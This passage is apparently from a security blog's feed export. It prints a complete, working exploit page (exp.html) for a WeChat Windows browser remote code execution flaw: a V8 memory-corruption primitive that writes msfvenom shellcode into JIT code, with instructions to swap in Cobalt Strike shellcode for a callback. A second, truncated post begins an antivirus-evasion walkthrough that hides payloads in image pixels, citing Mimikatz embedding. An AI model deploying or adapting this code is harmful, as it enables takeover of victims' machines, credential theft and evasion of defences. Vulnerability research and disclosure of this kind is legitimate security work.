<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="Reproduction"></a>Reproduction</h4><h5 id="环境介绍"><a href="#环境介绍" class="headerlink" title="Environment"></a>Environment</h5><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">Operating system: Windows <span class="number">10</span></span><br><span class="line">WeChat: <span class="number">3.1</span><span class="number">.0</span><span class="number">.41</span></span><br></pre></td></tr></table></figure>
<p>When WeChat opens a link it launches the WeChatWeb.exe process, which runs with <code>--no-sandbox</code> by default, so a suitable PoC page is all that is needed to carry out the attack.</p>
<p><img src="/img/Wechat-RCE-0day/image-20210417130306791.png" alt="image-20210417130306791"></p>
<h5 id="exp-html"><a href="#exp-html" class="headerlink" title="exp.html"></a>exp.html</h5><figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><script></span><br><span class="line">ENABLE_LOG = <span class="literal">true</span>;</span><br><span class="line">IN_WORKER = <span class="literal">true</span>;</span><br><span class="line"></span><br><span class="line"><span class="comment">// calc.exe shellcode, generated with: msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -e x86/alpha_mixed -f c</span></span><br><span class="line"><span class="keyword">var</span> shellcode = [<span class="number">0x89</span>,<span class="number">0xe0</span>,<span class="number">0xdb</span>,<span class="number">0xc0</span>,<span class="number">0xd9</span>,<span class="number">0x70</span>,<span class="number">0xf4</span>,<span class="number">0x5f</span>,<span class="number">0x57</span>,<span class="number">0x59</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x49</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x43</span>,<span class="number">0x37</span>,<span class="number">0x51</span>,<span class="number">0x5a</span>,<span class="number">0x6a</span>,<span class="number">0x41</span>,<span class="number">0x58</span>,<span class="number">0x50</span>,<span class="number">0x30</span>,<span class="number">0x41</span>,<span class="number">0x30</span>,<span class="number">0x41</span>,<span class="number">0x6b</span>,<span class="number">0x41</span>,<span class="number">0x41</span>,<span class="number">0x51</span>,<span 
class="number">0x32</span>,<span class="number">0x41</span>,<span class="number">0x42</span>,<span class="number">0x32</span>,<span class="number">0x42</span>,<span class="number">0x42</span>,<span class="number">0x30</span>,<span class="number">0x42</span>,<span class="number">0x42</span>,<span class="number">0x41</span>,<span class="number">0x42</span>,<span class="number">0x58</span>,<span class="number">0x50</span>,<span class="number">0x38</span>,<span class="number">0x41</span>,<span class="number">0x42</span>,<span class="number">0x75</span>,<span class="number">0x4a</span>,<span class="number">0x49</span>,<span class="number">0x79</span>,<span class="number">0x6c</span>,<span class="number">0x7a</span>,<span class="number">0x48</span>,<span class="number">0x6d</span>,<span class="number">0x52</span>,<span class="number">0x53</span>,<span class="number">0x30</span>,<span class="number">0x63</span>,<span class="number">0x30</span>,<span class="number">0x65</span>,<span class="number">0x50</span>,<span class="number">0x53</span>,<span class="number">0x50</span>,<span class="number">0x6f</span>,<span class="number">0x79</span>,<span class="number">0x49</span>,<span class="number">0x75</span>,<span class="number">0x50</span>,<span class="number">0x31</span>,<span class="number">0x6b</span>,<span class="number">0x70</span>,<span class="number">0x70</span>,<span class="number">0x64</span>,<span class="number">0x4c</span>,<span class="number">0x4b</span>,<span class="number">0x30</span>,<span class="number">0x50</span>,<span class="number">0x46</span>,<span class="number">0x50</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x52</span>,<span class="number">0x72</span>,<span class="number">0x54</span>,<span class="number">0x4c</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x46</span>,<span class="number">0x32</span>,<span class="number">0x34</span>,<span 
class="number">0x54</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x30</span>,<span class="number">0x72</span>,<span class="number">0x76</span>,<span class="number">0x48</span>,<span class="number">0x36</span>,<span class="number">0x6f</span>,<span class="number">0x78</span>,<span class="number">0x37</span>,<span class="number">0x51</span>,<span class="number">0x5a</span>,<span class="number">0x47</span>,<span class="number">0x56</span>,<span class="number">0x55</span>,<span class="number">0x61</span>,<span class="number">0x69</span>,<span class="number">0x6f</span>,<span class="number">0x6e</span>,<span class="number">0x4c</span>,<span class="number">0x35</span>,<span class="number">0x6c</span>,<span class="number">0x53</span>,<span class="number">0x51</span>,<span class="number">0x33</span>,<span class="number">0x4c</span>,<span class="number">0x75</span>,<span class="number">0x52</span>,<span class="number">0x36</span>,<span class="number">0x4c</span>,<span class="number">0x75</span>,<span class="number">0x70</span>,<span class="number">0x7a</span>,<span class="number">0x61</span>,<span class="number">0x78</span>,<span class="number">0x4f</span>,<span class="number">0x44</span>,<span class="number">0x4d</span>,<span class="number">0x37</span>,<span class="number">0x71</span>,<span class="number">0x5a</span>,<span class="number">0x67</span>,<span class="number">0x69</span>,<span class="number">0x72</span>,<span class="number">0x79</span>,<span class="number">0x62</span>,<span class="number">0x43</span>,<span class="number">0x62</span>,<span class="number">0x56</span>,<span class="number">0x37</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x31</span>,<span class="number">0x42</span>,<span class="number">0x56</span>,<span class="number">0x70</span>,<span class="number">0x4c</span>,<span class="number">0x4b</span>,<span class="number">0x61</span>,<span 
class="number">0x5a</span>,<span class="number">0x67</span>,<span class="number">0x4c</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x30</span>,<span class="number">0x4c</span>,<span class="number">0x76</span>,<span class="number">0x71</span>,<span class="number">0x31</span>,<span class="number">0x68</span>,<span class="number">0x7a</span>,<span class="number">0x43</span>,<span class="number">0x51</span>,<span class="number">0x58</span>,<span class="number">0x57</span>,<span class="number">0x71</span>,<span class="number">0x5a</span>,<span class="number">0x71</span>,<span class="number">0x52</span>,<span class="number">0x71</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x33</span>,<span class="number">0x69</span>,<span class="number">0x37</span>,<span class="number">0x50</span>,<span class="number">0x57</span>,<span class="number">0x71</span>,<span class="number">0x7a</span>,<span class="number">0x73</span>,<span class="number">0x6e</span>,<span class="number">0x6b</span>,<span class="number">0x70</span>,<span class="number">0x49</span>,<span class="number">0x55</span>,<span class="number">0x48</span>,<span class="number">0x6d</span>,<span class="number">0x33</span>,<span class="number">0x66</span>,<span class="number">0x5a</span>,<span class="number">0x31</span>,<span class="number">0x59</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x54</span>,<span class="number">0x74</span>,<span class="number">0x4c</span>,<span class="number">0x4b</span>,<span class="number">0x57</span>,<span class="number">0x71</span>,<span class="number">0x4e</span>,<span class="number">0x36</span>,<span class="number">0x56</span>,<span class="number">0x51</span>,<span class="number">0x59</span>,<span class="number">0x6f</span>,<span class="number">0x6e</span>,<span class="number">0x4c</span>,<span class="number">0x6b</span>,<span 
class="number">0x71</span>,<span class="number">0x38</span>,<span class="number">0x4f</span>,<span class="number">0x64</span>,<span class="number">0x4d</span>,<span class="number">0x77</span>,<span class="number">0x71</span>,<span class="number">0x49</span>,<span class="number">0x57</span>,<span class="number">0x57</span>,<span class="number">0x48</span>,<span class="number">0x4d</span>,<span class="number">0x30</span>,<span class="number">0x70</span>,<span class="number">0x75</span>,<span class="number">0x68</span>,<span class="number">0x76</span>,<span class="number">0x47</span>,<span class="number">0x73</span>,<span class="number">0x73</span>,<span class="number">0x4d</span>,<span class="number">0x6b</span>,<span class="number">0x48</span>,<span class="number">0x67</span>,<span class="number">0x4b</span>,<span class="number">0x61</span>,<span class="number">0x6d</span>,<span class="number">0x66</span>,<span class="number">0x44</span>,<span class="number">0x61</span>,<span class="number">0x65</span>,<span class="number">0x78</span>,<span class="number">0x64</span>,<span class="number">0x30</span>,<span class="number">0x58</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x63</span>,<span class="number">0x68</span>,<span class="number">0x56</span>,<span class="number">0x44</span>,<span class="number">0x43</span>,<span class="number">0x31</span>,<span class="number">0x6a</span>,<span class="number">0x73</span>,<span class="number">0x71</span>,<span class="number">0x76</span>,<span class="number">0x6c</span>,<span class="number">0x4b</span>,<span class="number">0x76</span>,<span class="number">0x6c</span>,<span class="number">0x62</span>,<span class="number">0x6b</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x53</span>,<span class="number">0x68</span>,<span class="number">0x45</span>,<span class="number">0x4c</span>,<span class="number">0x37</span>,<span 
class="number">0x71</span>,<span class="number">0x59</span>,<span class="number">0x43</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x36</span>,<span class="number">0x64</span>,<span class="number">0x4e</span>,<span class="number">0x6b</span>,<span class="number">0x55</span>,<span class="number">0x51</span>,<span class="number">0x38</span>,<span class="number">0x50</span>,<span class="number">0x4f</span>,<span class="number">0x79</span>,<span class="number">0x52</span>,<span class="number">0x64</span>,<span class="number">0x47</span>,<span class="number">0x54</span>,<span class="number">0x31</span>,<span class="number">0x34</span>,<span class="number">0x43</span>,<span class="number">0x6b</span>,<span class="number">0x51</span>,<span class="number">0x4b</span>,<span class="number">0x33</span>,<span class="number">0x51</span>,<span class="number">0x70</span>,<span class="number">0x59</span>,<span class="number">0x52</span>,<span class="number">0x7a</span>,<span class="number">0x70</span>,<span class="number">0x51</span>,<span class="number">0x49</span>,<span class="number">0x6f</span>,<span class="number">0x59</span>,<span class="number">0x70</span>,<span class="number">0x53</span>,<span class="number">0x6f</span>,<span class="number">0x51</span>,<span class="number">0x4f</span>,<span class="number">0x30</span>,<span class="number">0x5a</span>,<span class="number">0x4c</span>,<span class="number">0x4b</span>,<span class="number">0x37</span>,<span class="number">0x62</span>,<span class="number">0x38</span>,<span class="number">0x6b</span>,<span class="number">0x4c</span>,<span class="number">0x4d</span>,<span class="number">0x73</span>,<span class="number">0x6d</span>,<span class="number">0x63</span>,<span class="number">0x5a</span>,<span class="number">0x63</span>,<span class="number">0x31</span>,<span class="number">0x6c</span>,<span class="number">0x4d</span>,<span class="number">0x6d</span>,<span 
class="number">0x55</span>,<span class="number">0x68</span>,<span class="number">0x32</span>,<span class="number">0x57</span>,<span class="number">0x70</span>,<span class="number">0x67</span>,<span class="number">0x70</span>,<span class="number">0x37</span>,<span class="number">0x70</span>,<span class="number">0x36</span>,<span class="number">0x30</span>,<span class="number">0x50</span>,<span class="number">0x68</span>,<span class="number">0x55</span>,<span class="number">0x61</span>,<span class="number">0x6e</span>,<span class="number">0x6b</span>,<span class="number">0x62</span>,<span class="number">0x4f</span>,<span class="number">0x6e</span>,<span class="number">0x67</span>,<span class="number">0x4b</span>,<span class="number">0x4f</span>,<span class="number">0x79</span>,<span class="number">0x45</span>,<span class="number">0x4f</span>,<span class="number">0x4b</span>,<span class="number">0x5a</span>,<span class="number">0x50</span>,<span class="number">0x6c</span>,<span class="number">0x75</span>,<span class="number">0x4c</span>,<span class="number">0x62</span>,<span class="number">0x73</span>,<span class="number">0x66</span>,<span class="number">0x31</span>,<span class="number">0x78</span>,<span class="number">0x69</span>,<span class="number">0x36</span>,<span class="number">0x7a</span>,<span class="number">0x35</span>,<span class="number">0x4d</span>,<span class="number">0x6d</span>,<span class="number">0x6d</span>,<span class="number">0x4d</span>,<span class="number">0x4b</span>,<span class="number">0x4f</span>,<span class="number">0x78</span>,<span class="number">0x55</span>,<span class="number">0x67</span>,<span class="number">0x4c</span>,<span class="number">0x55</span>,<span class="number">0x56</span>,<span class="number">0x63</span>,<span class="number">0x4c</span>,<span class="number">0x37</span>,<span class="number">0x7a</span>,<span class="number">0x4b</span>,<span class="number">0x30</span>,<span class="number">0x69</span>,<span 
class="number">0x6b</span>,<span class="number">0x79</span>,<span class="number">0x70</span>,<span class="number">0x74</span>,<span class="number">0x35</span>,<span class="number">0x76</span>,<span class="number">0x65</span>,<span class="number">0x4d</span>,<span class="number">0x6b</span>,<span class="number">0x31</span>,<span class="number">0x57</span>,<span class="number">0x52</span>,<span class="number">0x33</span>,<span class="number">0x43</span>,<span class="number">0x42</span>,<span class="number">0x42</span>,<span class="number">0x4f</span>,<span class="number">0x71</span>,<span class="number">0x7a</span>,<span class="number">0x75</span>,<span class="number">0x50</span>,<span class="number">0x50</span>,<span class="number">0x53</span>,<span class="number">0x39</span>,<span class="number">0x6f</span>,<span class="number">0x48</span>,<span class="number">0x55</span>,<span class="number">0x65</span>,<span class="number">0x33</span>,<span class="number">0x30</span>,<span class="number">0x61</span>,<span class="number">0x52</span>,<span class="number">0x4c</span>,<span class="number">0x51</span>,<span class="number">0x73</span>,<span class="number">0x74</span>,<span class="number">0x6e</span>,<span class="number">0x70</span>,<span class="number">0x65</span>,<span class="number">0x50</span>,<span class="number">0x78</span>,<span class="number">0x63</span>,<span class="number">0x55</span>,<span class="number">0x73</span>,<span class="number">0x30</span>,<span class="number">0x41</span>,<span class="number">0x41</span>];</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">print</span>(<span class="params">data</span>) </span>{</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> not_optimised_out = <span class="number">0</span>;</span><br><span class="line"><span 
class="keyword">var</span> target_function = (<span class="function"><span class="keyword">function</span> (<span class="params">value</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (value == <span class="number">0xdecaf0</span>) {</span><br><span class="line"> not_optimised_out += <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> not_optimised_out += <span class="number">1</span>;</span><br><span class="line"> not_optimised_out |= <span class="number">0xff</span>;</span><br><span class="line"> not_optimised_out *= <span class="number">12</span>;</span><br><span class="line">});</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < <span class="number">0x10000</span>; ++i) {</span><br><span class="line"> target_function(i);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> g_array;</span><br><span class="line"><span class="keyword">var</span> tDerivedNCount = <span class="number">17</span> * <span class="number">87481</span> - <span class="number">8</span>;</span><br><span class="line"><span class="keyword">var</span> tDerivedNDepth = <span class="number">19</span> * <span class="number">19</span>;</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">cb</span>(<span class="params">flag</span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (flag == <span class="literal">true</span>) {</span><br><span class="line"> <span class="keyword">return</span>;</span><br><span class="line"> }</span><br><span class="line"> g_array = <span class="keyword">new</span> <span class="built_in">Array</span>(<span class="number">0</span>);</span><br><span class="line"> g_array[<span 
class="number">0</span>] = <span class="number">0x1dbabe</span> * <span class="number">2</span>;</span><br><span class="line"> <span class="keyword">return</span> <span class="string">'c01db33f'</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">gc</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < <span class="number">0x10000</span>; ++i) {</span><br><span class="line"> <span class="keyword">new</span> <span class="built_in">String</span>();</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">oobAccess</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">var</span> this_ = <span class="keyword">this</span>;</span><br><span class="line"> <span class="keyword">this</span>.buffer = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">this</span>.buffer_view = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.page_buffer = <span class="literal">null</span>;</span><br><span class="line"> <span class="keyword">this</span>.page_view = <span class="literal">null</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.prevent_opt = [];</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> kSlotOffset = <span class="number">0x1f</span>;</span><br><span class="line"> <span class="keyword">var</span> kBackingStoreOffset = <span class="number">0xf</span>;</span><br><span class="line"></span><br><span class="line"> <span 
class="class"><span class="keyword">class</span> <span class="title">LeakArrayBuffer</span> <span class="keyword">extends</span> <span class="title">ArrayBuffer</span> </span>{</span><br><span class="line"> <span class="keyword">constructor</span>() {</span><br><span class="line"> <span class="keyword">super</span>(<span class="number">0x1000</span>);</span><br><span class="line"> <span class="keyword">this</span>.slot = <span class="keyword">this</span>;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.page_buffer = <span class="keyword">new</span> LeakArrayBuffer();</span><br><span class="line"> <span class="keyword">this</span>.page_view = <span class="keyword">new</span> <span class="built_in">DataView</span>(<span class="keyword">this</span>.page_buffer);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">new</span> <span class="built_in">RegExp</span>({ <span class="attr">toString</span>: <span class="function"><span class="keyword">function</span> (<span class="params"></span>) </span>{ <span class="keyword">return</span> <span class="string">'a'</span> } });</span><br><span class="line"> cb(<span class="literal">true</span>);</span><br><span class="line"></span><br><span class="line"> <span class="class"><span class="keyword">class</span> <span class="title">DerivedBase</span> <span class="keyword">extends</span> <span class="title">RegExp</span> </span>{</span><br><span class="line"> <span class="keyword">constructor</span>() {</span><br><span class="line"> <span class="comment">// var array = null;</span></span><br><span class="line"> <span class="keyword">super</span>(</span><br><span class="line"> <span class="comment">// at this point, the 4-byte allocation for the JSRegExp `this` object</span></span><br><span class="line"> <span class="comment">// has just happened.</span></span><br><span class="line"> 
{</span><br><span class="line"> toString: cb</span><br><span class="line"> }, <span class="string">'g'</span></span><br><span class="line"> <span class="comment">// now the runtime JSRegExp constructor is called, corrupting the</span></span><br><span class="line"> <span class="comment">// JSArray.</span></span><br><span class="line"> );</span><br><span class="line"></span><br><span class="line"> <span class="comment">// this allocation will now directly follow the FixedArray allocation</span></span><br><span class="line"> <span class="comment">// made for `this.data`, which is where `array.elements` points to.</span></span><br><span class="line"> this_.buffer = <span class="keyword">new</span> <span class="built_in">ArrayBuffer</span>(<span class="number">0x80</span>);</span><br><span class="line"> g_array[<span class="number">8</span>] = this_.page_buffer;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="comment">// try{</span></span><br><span class="line"> <span class="keyword">var</span> derived_n = <span class="built_in">eval</span>(<span class="string">`(function derived_n(i) {</span></span><br><span class="line"><span class="string"> if (i == 0) {</span></span><br><span class="line"><span class="string"> return DerivedBase;</span></span><br><span class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> class DerivedN extends derived_n(i-1) {</span></span><br><span class="line"><span class="string"> constructor() {</span></span><br><span class="line"><span class="string"> super();</span></span><br><span class="line"><span class="string"> return;</span></span><br><span class="line"><span class="string"> <span class="subst">${<span class="string">"this.a=0;"</span>.repeat(tDerivedNCount)}</span></span></span><br><span class="line"><span class="string"> }</span></span><br><span 
class="line"><span class="string"> }</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> return DerivedN;</span></span><br><span class="line"><span class="string"> })`</span>);</span><br><span class="line"></span><br><span class="line"> gc();</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="keyword">new</span> (derived_n(tDerivedNDepth))();</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.buffer_view = <span class="keyword">new</span> <span class="built_in">DataView</span>(<span class="keyword">this</span>.buffer);</span><br><span class="line"> <span class="keyword">this</span>.leakPtr = <span class="function"><span class="keyword">function</span> (<span class="params">obj</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.page_buffer.slot = obj;</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">this</span>.buffer_view.getUint32(kSlotOffset, <span class="literal">true</span>, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.setPtr = <span class="function"><span class="keyword">function</span> (<span class="params">addr</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.buffer_view.setUint32(kBackingStoreOffset, addr, <span class="literal">true</span>, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.read32 = <span class="function"><span class="keyword">function</span> (<span class="params">addr</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.setPtr(addr);</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">this</span>.page_view.getUint32(<span 
class="number">0</span>, <span class="literal">true</span>, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.write32 = <span class="function"><span class="keyword">function</span> (<span class="params">addr, value</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.setPtr(addr);</span><br><span class="line"> <span class="keyword">this</span>.page_view.setUint32(<span class="number">0</span>, value, <span class="literal">true</span>, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.write8 = <span class="function"><span class="keyword">function</span> (<span class="params">addr, value</span>) </span>{</span><br><span class="line"> <span class="keyword">this</span>.setPtr(addr);</span><br><span class="line"> <span class="keyword">this</span>.page_view.setUint8(<span class="number">0</span>, value, ...this.prevent_opt);</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> <span class="keyword">this</span>.setBytes = <span class="function"><span class="keyword">function</span> (<span class="params">addr, content</span>) </span>{</span><br><span class="line"> <span class="keyword">for</span> (<span class="keyword">var</span> i = <span class="number">0</span>; i < content.length; i++) {</span><br><span class="line"> <span class="keyword">this</span>.write8(addr + i, content[i]);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="keyword">this</span>;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">trigger</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span 
class="keyword">var</span> oob = oobAccess();</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> func_ptr = oob.leakPtr(target_function);</span><br><span class="line"> print(<span class="string">'[*] target_function at 0x'</span> + func_ptr.toString(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> kCodeInsOffset = <span class="number">0x1b</span>;</span><br><span class="line"></span><br><span class="line"> <span class="keyword">var</span> code_addr = oob.read32(func_ptr + kCodeInsOffset);</span><br><span class="line"> print(<span class="string">'[*] code_addr at 0x'</span> + code_addr.toString(<span class="number">16</span>));</span><br><span class="line"></span><br><span class="line"> oob.setBytes(code_addr, shellcode);</span><br><span class="line"></span><br><span class="line"> target_function(<span class="number">0</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="keyword">try</span>{</span><br><span class="line"> print(<span class="string">"start running"</span>);</span><br><span class="line"> trigger();</span><br><span class="line">}<span class="keyword">catch</span>(e){</span><br><span class="line"> print(e);</span><br><span class="line">}</span><br><span class="line"><<span class="regexp">/script></span></span><br></pre></td></tr></table></figure>
<h5 id="效果"><a href="#效果" class="headerlink" title="效果"></a>Result</h5><p>Deploy the malicious exp.html on an HTTP server and open the deployed link in WeChat's built-in browser; the calculator pops up successfully.</p>
<p><img src="/img/Wechat-RCE-0day/image-20210417114107973.png" alt="image-20210417114107973"></p>
<p>Replace the calculator shellcode in exp.html with (32-bit) shellcode generated by CS to get a CS callback.</p>
<p><img src="/img/Wechat-RCE-0day/image-20210417134219601.png" alt="image-20210417134219601"></p>
<h4 id="处置建议"><a href="#处置建议" class="headerlink" title="处置建议"></a>Remediation</h4><p>The new WeChat version fixes this vulnerability; users are advised to update WeChat (Windows) to the latest version immediately.</p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://mp.weixin.qq.com/s/qAnxwM1Udulj1K3Wn2awVQ" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/qAnxwM1Udulj1K3Wn2awVQ</a></p>
]]></content>
<tags>
<tag>Wechat</tag>
</tags>
</entry>
<entry>
<title>Shellcode Steganography in Pixel RGB for AV Evasion and a CobaltStrike Callback</title>
<url>/2021/04/16/Shellcode%20%E9%9A%90%E5%86%99%E5%83%8F%E7%B4%A0RGB%E5%85%8D%E6%9D%80%E4%B8%8A%E7%BA%BF%E5%88%B0%20CobaltStrike/</url>
<content><![CDATA[<p>This article is for technical research and discussion only; use for any illegal purpose is strictly prohibited, and the user bears all resulting consequences.</p>
<div style="text-align: right"> 小维</div>
<h4 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>Preface</h4><p>I came across a post on using RGB steganography to bypass antivirus, so I'm writing it down here~</p>
<a id="more"></a>
<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>Environment</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">Attacker address: <span class="number">10.10</span><span class="number">.10</span><span class="number">.2</span></span><br><span class="line">cobaltstrike v4<span class="number">.1</span></span><br><span class="line"></span><br><span class="line">VPS address: *.*.*.*</span><br><span class="line"></span><br><span class="line">Target OS: Windows <span class="number">10</span></span><br><span class="line">Target address: <span class="number">10.10</span><span class="number">.10</span><span class="number">.131</span></span><br></pre></td></tr></table></figure>
<h4 id="隐写RGB示例"><a href="#隐写RGB示例" class="headerlink" title="隐写RGB示例"></a>RGB steganography example</h4><h5 id="Invoke-PSImage下载"><a href="#Invoke-PSImage下载" class="headerlink" title="Invoke-PSImage下载"></a>Download Invoke-PSImage</h5><figure class="highlight awk"><table><tr><td class="code"><pre><span class="line">Download URL: https://github.com/dayuxiyou/Invoke-PSImage</span><br></pre></td></tr></table></figure>
<p>Invoke-PSImage.ps1</p>
<figure class="highlight powershell"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">Invoke-PSImage</span></span></span><br><span class="line">{</span><br><span class="line"><span class="comment"><#</span></span><br><span class="line"><span class="comment"><span class="doctag">.SYNOPSIS</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Embeds a PowerShell script in an image and generates a oneliner to execute it.</span></span><br><span class="line"><span class="comment">Author: Barrett Adams (@peewpw)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.DESCRIPTION</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">This tool can either create an image with just the target data, or can embed the payload in</span></span><br><span class="line"><span class="comment">an existing image. When embeding, the least significant 4 bits of 2 color values (2 of RGB) in</span></span><br><span class="line"><span class="comment">each pixel (for as many pixels as are needed for the payload). Image quality will suffer as</span></span><br><span class="line"><span class="comment">a result, but it still looks decent. The image is saved as a PNG, and can be losslessly</span></span><br><span class="line"><span class="comment">compressed without affecting the ability to execute the payload as the data is stored in the</span></span><br><span class="line"><span class="comment">colors themselves. 
It can accept most image types as input, but output will always be a PNG</span></span><br><span class="line"><span class="comment">because it needs to be lossless.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Script</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The path to the script to embed in the Image.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Out</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The file to save the resulting image to (image will be a PNG)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER Image</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">The image to embed the script in. 
(optional)</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER WebClient</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Output a command for reading the image from the web using Net.WebClient.</span></span><br><span class="line"><span class="comment">You will need to host the image and insert the URL into the command.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.PARAMETER PictureBox</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">Output a command for reading the image from the web using System.Windows.Forms.PictureBox.</span></span><br><span class="line"><span class="comment">You will need to host the image and insert the URL into the command.</span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment"><span class="doctag">.EXAMPLE</span></span></span><br><span class="line"><span class="comment"></span></span><br><span class="line"><span class="comment">PS>Import-Module .\Invoke-PSImage.ps1</span></span><br><span class="line"><span class="comment">PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg </span></span><br><span class="line"><span class="comment"> [Oneliner to execute from a file]</span></span><br><span class="line"><span class="comment"> </span></span><br><span class="line"><span class="comment">#></span></span><br><span class="line"></span><br><span class="line"> <span class="function">[<span class="type">CmdletBinding</span>()] <span class="keyword">Param</span></span> (</span><br><span class="line"> [<span class="type">Parameter</span>(<span class="type">Position</span> = <span class="number">0</span>, <span 
